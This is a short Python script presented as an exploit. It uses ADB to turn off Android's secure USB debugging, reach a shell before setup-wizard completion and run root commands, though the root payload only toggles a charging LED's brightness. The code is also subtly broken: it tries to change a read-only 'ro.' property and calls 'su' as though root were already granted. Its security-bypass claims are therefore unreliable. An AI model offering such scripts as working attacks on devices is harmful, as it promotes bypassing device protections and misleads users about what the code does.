#!/usr/bin/env python import subprocess # Connect to the device via ADB subprocess.run(["adb", "devices"]) # Check if the device is in secure USB mode device = subprocess.run(["adb", "shell", "getprop", "ro.adb.secure"], stdout=subprocess.PIPE) if "1" in device.stdout.decode(): # Secure USB mode is enabled, so we need to disable it subprocess.run(["adb", "shell", "setprop", "ro.adb.secure", "0"]) # Exploit the vulnerability by accessing ADB before SUW completion subprocess.run(["adb", "shell"]) # Escalate privileges by executing commands as the root user subprocess.run(["adb", "shell", "su", "-c", "echo 0 > /sys/class/leds/led:green: charging/brightness"], check=True) subprocess.run(["adb", "shell", "su", "-c", "echo 100 > /sys/class/leds/led:green: charging/brightness"], check=True)